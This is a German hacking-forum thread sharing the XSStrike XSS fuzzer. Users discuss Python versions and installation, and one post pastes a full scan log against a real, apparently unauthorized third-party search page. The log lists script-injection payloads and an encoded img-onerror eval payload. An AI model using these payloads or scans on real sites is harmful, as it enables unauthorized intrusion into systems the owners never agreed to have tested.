Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

XSStrike - Fuzz and Bruteforce Parameters for XSS

- - - - -

  • Bitte melde dich an um zu Antworten
4 Antworten in diesem Thema

#1
jmPesp

jmPesp

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    35
  • 47 Beiträge
  • 7 Bedankt
  • 826012
  • iPhone
  • Windows, Linux, Mac OS

xsstrike_01.jpg

 

 

Please Login HERE or Register HERE to see this link!


  • SecurityFlaw gefällt das

#2
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    212
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Ist Python 3 oder?

Hab 2.7 installiert und es zeigt mir alles im CMD recht entstellt an.

 

Schade!



#3
Mini Rick

Mini Rick

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    12
  • 26 Beiträge
  • 4 Bedankt
  • Android [root]
  • Linux

Ist Python 3 oder?

 

Nein ist es nicht. Funktioniert auch gar nicht mit python3.

Hast du die Requirements installiert?

 

 

Leider funktioniert das Tool bei mir aber auch nicht sonderlich gut...

Die Seite macht aus < und > die Zeichen &lt; und &gt; also keine Lücke. Trotzdem behauptet das Tool welche gefunden zu haben...

        Made with <3 by Somdev Sangwan : TeamUltimate.in
 _     _ _______ _______ _______  ______ _____ _     _ _______
  \___/  |______ |______    |    |_____/   |   |____/  |______
 _/   \_ ______| ______|    |    |    \_ __|__ |    \_ |______
	       Enter "help" to access help manual
-----------------------------------------------------------------
[?] Enter the target URL: http://biblehub.net/search.php?q=d3v
[+] WAF Status: Offline

1. Fuzzer
2. Striker
3. Hulk
Enter your choice: 1
--------------------------------------------
[+] Number of reflecttions found: 16
[>] Scanning all the reflections
[>] Testing reflection number: 1
[!] Reflection found as data or plaintext on the page.
[+] Suggested Payload: </title><script>alert(1);</script>
[>] Testing reflection number: 2
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 3
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 4
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 5
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 6
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 7
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 8
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 9
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 10
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 11
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 12
[!] Reflection found as an attribute in an HTML tag.
[+] Suggested Payload: "></a><script>alert();</script>
[>] Testing reflection number: 13
[!] Reflection found as an attribute in an empty tag.
[!] Parameter was reflected in an attribute of an empty tag.
[+] Suggested Payload: "/><script>alert();</script><br attr="
[>] Testing reflection number: 14
[!] Reflection found as data or plaintext on the page.
[-] No successful fuzzing attacks. Check manually to confirm.
[>] Testing reflection number: 15
[!] Reflection found as data or plaintext on the page.
[-] No successful fuzzing attacks. Check manually to confirm.
[>] Testing reflection number: 16
[!] Reflection found as data or plaintext on the page.
[-] No successful fuzzing attacks. Check manually to confirm.
[!] Scan complete. List of suggested payloads:
</title><script>alert(1);</script>
"></a><script>alert();</script>
"/><script>alert();</script><br attr="
[?] Do you want to use striker? [Y/n] Y
--------------------------------------------
[>] Payloads loaded: 17
[>] Striking the paramter(s)
[>] Testing parameter: q
[>] Payloads injected: 4 / 17
[+] XSS Vulnerability Found! 
[+] Parameter:	q
[+] Payload:	%3c%69%4d%67%20%73%52%63%3d%78%3a%61%6c%65%72%74%60%60%20%6f%4e%45%72%72%6f%72%3d%65%76%61%6c%28%73%72%63%29%3e
[?] Keep the scan running? [y/N] y
[>] Payloads injected: 17 / 17
[-] 'q' parameter not vulnerable.
[!] Strike completed.
[+] 1 Parameter is vulnerable to XSS.


#4
jmPesp

jmPesp

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    35
  • 47 Beiträge
  • 7 Bedankt
  • 826012
  • iPhone
  • Windows, Linux, Mac OS

@SecurityFlaw

 

hast du die Abhängigkeiten Installiert?  "pip install -r requirements.txt"

@Mini Rick

 

Es ist in der Tat noch etwas Buggy ... aber es wird noch geudatet und von Bugs befreit :)



#5
SecurityFlaw

SecurityFlaw

    ██████████

  • Members
  • PIPPIPPIPPIPPIPPIPPIPPIPPIP
  • Likes
    212
  • 256 Beiträge
  • 112 Bedankt
  • Android, Android [root]
  • Windows, Linux

Ja die hatte ich bereits installiert bevor ich es das erste mal gestartet habe.





  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 38 user(s)


    3eyes, baddog, BlackDante, Bot4ng, BurgerBoy, chexum, cruzz, cyb3rfly, Cyber Tjak, CyberFlash, Dr. Spic, Erikson, Framerater, funstyler, hacked, JackTheRapper, jmPesp, Kaase, keyb0ardz, kiwitone, Kraenk, m0nk3y, MarkSantos, Mini Rick, n1nja, nong_dan, PadX18, pfadn, PHIPU, pi^2, Psykoon303, SavE1, SecurityFlaw, smc2014, sniffer, Terrafaux, Toskom4n, wbx32
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.